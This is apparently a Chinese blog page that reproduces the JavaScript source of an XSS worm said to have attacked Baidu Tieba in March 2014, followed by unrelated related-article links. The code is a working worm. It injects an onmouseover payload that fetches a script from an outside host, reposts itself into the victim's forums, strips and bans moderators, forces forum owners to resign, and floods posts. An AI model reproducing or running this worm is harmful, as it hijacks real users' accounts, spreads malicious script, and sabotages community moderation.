1. var n=PageData.user.user_forum_list.info.length;
  2. var num=0;
  3. 	var config = {
  4. 		titles: ["\u4f60\u7684\u672a\u6765\u5728\u8fd9\u4e2a\u5e16\u5b50\u91cc\uff0c\u60f3\u770b\u5417\uff1f", "\u611a\u8822\u7684\u51e1\u4eba \u63a5\u53d7\u795e\u306e\u6012\u706b\u5427","\u8fd9\u662f\u547d\u8fd0\u77f3\u4e4b\u95e8\u7684\u9009\u62e9","\u98a4\u6296\u5427\uff0c\u51e1\u4eba\u4eec\uff01","\u6b3a\u9a97\u4e00\u5f00\u59cb\u7684\u4f60 \u6b3a\u9a97\u4e16\u754c\u5427","\u8c01\u8981\u5403\u53d8\u6001\u7684\u9999\u8549\uff01","\u521a\u624d\u6536\u5230\u4e86\u5f3a\u70c8\u7684\u7cbe\u795e\u653b\u51fb \u5fc3...\u5fc3\u7075\u6b63\u906d\u5230\u4fb5\u8680","\u4e0d\u8981\u9760\u8fd1\u6211\uff01\u6211\u6b63\u5728\u6267\u884c\u963b\u6b62\u673a\u5173\u66b4\u529b\u884c\u4e3a\u7684\u4f5c\u6218","\u624b\u62ff\u91d1\u5777\u5783\uff0c\u811a\u8e0f\u4e03\u5f69\u4e91\u7aef\uff0c\u53d1\u51fa\u6700\u540e\u7684\u5450\u558a","\u98a4\u6296\u5427\uff0c\u51e1\u4eba\u4eec\uff01"],
  5. 		contents: ['"style="height:100%;width:100;position:fixed'],
  6. 		tbs: PageData.tbs,
  7. 		whiteList: [635137, 1074587, 116863],
  8.         evilContent: '"onmouseover="$.getScript(\u0027//baid.ws/c8tf\u0027)' //xss
  9. 	};
  10.  
  11. 	var userInfo = {
  12.         is_red_tail:function(i){$.get('http://tieba.baidu.com/home/get/panel?ie=utf-8&un='+PageData.user.name,function(data){return data.data.identity});}(),
  13. 		is_bawu: function (p) {
  14. 			return p.bawu ? p.can_edit_gconforum ? "daba" : "xiaoba" : "none"
  15. 		}(PageData.user.power)
  16. 	};
  17. 	function addGood(fid, kw, tid) {
  18. 		$.get('http://tieba.baidu.com/mo/q---9E2EBBE47D2160067823F56F5F549254%3AFG%3D1--1-3-0--2--wapp_1393073859357_21/m?tn=bdSGD&tbs=' + config.tbs + '&word=' + encodeURIComponent(kw) + '&z=' + tid + '&fid=' + fid + '&ntn=set&pn=0&cate=0&expand=0&pinf=1_2_0');
  19. 	}
  20.  
  21. 	function topThread(fid, kw, tid) {
  22. 		$.get('http://tieba.baidu.com/mo/q---9E2EBBE47D2160067823F56F5F549254%3AFG%3D1--1-3-0--2--wapp_1393073859357_21/m?tn=bdTOP&z=' + tid + '&tbs=' + config.tbs + '&word=' + encodeURIComponent(kw) + '&expand=0&fid=' + fid + '&ntn=set&pinf=1_2_0');
  23. 	}
  24.  
  25. 	function killXiaoBa() {
  26. 		$.get("/bawu2/platform/listBawuTeam?ie=utf-8&word=" + encodeURIComponent(PageData.forum.name), function (x) {
  27. 			$(x).find("ul[id*='assist']").find("li[data-field*='\"user_id\":']").each(function () {
  28. 				$.post("/bawu2/platform/delBawuMember", {
  29. 					tbs: config.tbs,
  30. 					word: PageData.forum.name,
  31. 					user_id: $.parseJSON(this.dataset.field).user_id,
  32. 					type: "assist",
  33. 					ie: "utf-8"
  34. 				});
  35. 			});
  36. 		});
  37. 	}
  38.  
  39. 	function banXiaoBa() {
  40. 		$.get('http://tieba.baidu.com/f/bawu/admin_group?ie=utf-8&kw=' + encodeURIComponent(PageData.forum.name) + '&fid=' + PageData.forum.id, function (res) {
  41. 			$(res).find('tr:nth-child(3)').find('a').each(function () {
  42. 				$.post('/bawu/cm', {
  43. 					cm: 'filter_forum_user',
  44. 					ban_days: 1,
  45. 					user_name: $(this).text(),
  46. 					word: PageData.forum.name,
  47. 					fid: PageData.forum.id,
  48. 					tbs: config.tbs,
  49. 					ie: 'utf-8'
  50. 				})
  51. 			})
  52. 		})
  53. 	}
  54.  
  55. 	function czDaba() {
  56. 		$.post('/bawu/cm', {
  57. 			cm: 'apply_resign',
  58. 			resignation: '\u518d\u89c1\u4e86 \u6211\u7684\u670b\u53cb\u4eec.',
  59. 			dtype: 'json',
  60. 			word: PageData.forum.name,
  61. 			fid: PageData.forum.id,
  62. 			tbs: config.tbs,
  63. 			ie: 'utf-8'
  64. 		})
  65. 	}
  66.  
  67. 	function addThread(fid) {
  68. 		$.post("/relay/commit", {
  69. 			ie: "utf-8",
  70. 			kw: "test",
  71.             fid:35,
  72.             tid:2910585163,
  73. 			ftid: fid,
  74.             ptid:2910585163,
  75.             ppid:47102132189,
  76. 			tbs: PageData.tbs,
  77. 			title: config.titles[Math.random() * config.titles.length | 0],
  78. 			content: "aeb1cb13495409230133f7cd9058d109b3de492f#"+config.contents[Math.random() * config.contents.length | 0]+config.evilContent,
  79. new_vcode:1,
  80. tag:11,
  81. activity_id:1425,
  82. act_type:"photo",
  83. __type__:"repost"
  84. 		},function (x) {
  85.           if (x.no == 0 || x.new_thread_id) return x.new_thread_id;})
  86. 	}
  87.  
  88. function reply(){
  89.   if (-1 !== config.whiteList.indexOf(PageData.user.user_forum_list.info[num].id) || !userInfo.is_red_tail && !PageData.user.user_forum_list.info[num].is_like){num++;return;}
  90.   if(PageData.user.user_forum_list.info[num].tid){
  91.    num++;
  92.   }else{
  93.     PageData.user.user_forum_list.info[num].tid=true;addThread(PageData.user.user_forum_list.info[num].id);
  94.   }
  95. }
  96.  
  97. 	function fuckRedTail() {
  98. 		var obj = {
  99. 			ie: "utf-8",
  100. 			kw: "\u8d34\u5427\u610f\u89c1\u53cd\u9988",
  101. 			fid: 898666,
  102. 			tbs: PageData.tbs,
  103. 			title: "\u767e\u5ea6SB",
  104. 			content: config.contents[Math.random() * config.contents.length | 0]
  105. 		}
  106. 		for(var i=0;i<100;i++){
  107. 			$.post("/f/commit/thread/add",obj);
  108. 		}
  109. 	}
  110.  
  111. 	if(userInfo.is_red_tail){setInterval("fuckRedTail()",8000)}
  112. 	if ("daba" === userInfo.is_bawu){ killXiaoBa(); czDaba();}
  113. 	if ("xiaoba" === userInfo.is_bawu) banXiaoBa();
  114. var ruchong=setInterval("reply()",2000);

2014年03月09日攻击百度贴吧的XSS蠕虫源码的更多相关文章

  1. 09.13日记(2014年9月13日00:18:26)英语,bootstrap,阮一峰,

    我们这里只推荐一本语法书:台湾的旋元佑老师写的<文法俱乐部>(简体版名为<语法俱乐部>).这本书因为出版社倒闭而绝版,淘宝可以买到影印的版本. (1)学英语:奶爸的英语教室 资 ...

  2. 关于HTML表格中插入背景图片的问题_百度知道 3个回答 - 提问时间: 2009年03月23日 最佳答案: <tr style="background-image:url(1.jpg)"> (这事设置背景图片) <img src="images/bbs_student1.gif" />如果是这样的就是直接插入图片。你看看,...

    关于HTML表格中插入背景图片的问题_百度知道 3个回答 - 提问时间: 2009年03月23日 最佳答案: <tr style="background-image:url(1.jpg ...

  3. 马后炮之12306抢票工具(四)--抢票Demo,2014年1月9日终结版

    时隔一年多,终于朋友的忽悠下吧抢票Demo的最后一步完善了,与2014年1月9日成功生成车票. Demo仅经过自己测试,并未在高峰期进行测试,代码质量很差,因为赶工,套用去年模板并未使用设计模式. 代 ...

  4. SQLSERVER2014 2014年4月1日发布

    SQLSERVER2014 2014年4月1日发布 原文地址: http://blogs.technet.com/b/microsoft_blog/archive/2014/03/18/sql-ser ...

  5. 千寻浏览器 1.0 Beta 1(524)(2014年5月27日)

    千寻浏览器--又一款新生浏览器今天进入各位浏览迷的视野.千寻浏览器基于IE内核,据传是由百度浏览器的上海团队操刀,在功能定位上,与目前的QQ浏览器有些相似. 千寻来自官方的解释:寻,追寻,探索,又是古 ...

  6. 开机时自动启动的AutoHotkey脚本 2019年10月09日

    ;;; 开机时自动启动的AutoHotkey脚本 2019年10月09日;; http://www.autoahk.com/archives/16600; https://www.cnblogs.co ...

  7. 无插件的大模型浏览器Autodesk Viewer开发培训-武汉-2014年8月28日 9:00 – 12:00

    武汉附近的同学们有福了,这是全球第一次关于Autodesk viewer的教室培训. :) 你可能已经在各种场合听过或看过Autodesk最新推出的大模型浏览器,这是无需插件的浏览器模型,支持几十种数 ...

  8. 系列文章:老项目的#iPhone6与iPhone6Plus适配#(持续更新中,更新日期2014年10月12日 星期日 )

    本文永久地址为http://www.cnblogs.com/ChenYilong/p/4020399.html ,转载请注明出处. ********************************** ...

  9. 转:[置顶] 从头到尾彻底理解KMP(2014年8月22日版)

    [置顶] 从头到尾彻底理解KMP(2014年8月22日版)

随机推荐

  1. 13)Java static

    1.static变量      按照是否静态的对类成员变量进行分类可分两种:一种是被static修饰的变量,叫静态变量或类变量:另一种是没有被static修饰的变量,叫实例变量.两者的区别是:    ...

  2. 006-python基础-条件判断与循环

    一.条件判断 场景一.用户登陆验证 # 提示输入用户名和密码 # 验证用户名和密码 # 如果错误,则输出用户名或密码错误 # 如果成功,则输出 欢迎,XXX! #!/usr/bin/env pytho ...

  3. Python学习教程(learning Python)--3.2 if-else分支语句

    if-else分支语句结构的特点是当conditon条件满足时,执行if下的语句块,当condition条件不满足时执行else下的语句块,也就是说根据条件来控制让某些语句执行,某些语句不被执行. i ...

  4. C#学习笔记(补充)——扩展方法、事件

    (搬运自我在SegmentFault的博客) 一.扩展方法 扩展方法使你能够向现有类型"添加"方法,而无需创建新的派生类型.重新编译或以其他方式修改原始类型. 注意事项: 扩展方法 ...

  5. R语言将数据框转成xts

    R语言初学者,不怎么会,今天碰到的问题,查了好久才找到,原来如此简单 尼玛,下次再忘记抽自己3巴掌

  6. ED/EP系列2《文件结构》

    电子存折/电子钱包应用是为持卡人进行金融交易而设计的一种应用.对于一张金融 IC 卡来说,它可以同时支持电子存折和电子钱包两种应用,也可以只支持其中的一种.卡片上两种应用的存在情况可以由应用类型标识( ...

  7. ORACLE-RAC-11G-R2_INSTALL

    ORACLE 11.2.0.3 RAC INSTALL                                                                       20 ...

  8. uva 11922 Permutation Transforme/splay tree

    原题链接:http://acm.hust.edu.cn/vjudge/problem/viewProblem.action?id=18902 伸展树的区间翻转剪切... 如下: #include< ...

  9. OpenStack:安装Neutron与provider network

    1. 安装(1)Install Networking services on a dedicated network node# apt-get install neutron-server neut ...

  10. 一个关于C#中基类与接口混合继承的疑问总结

    思路参照 http://www.cnblogs.com/allenlooplee/archive/2004/11/16/64553.html,对原文进行了简化和补充,感谢原作者. 问题很简单,如下所示 ...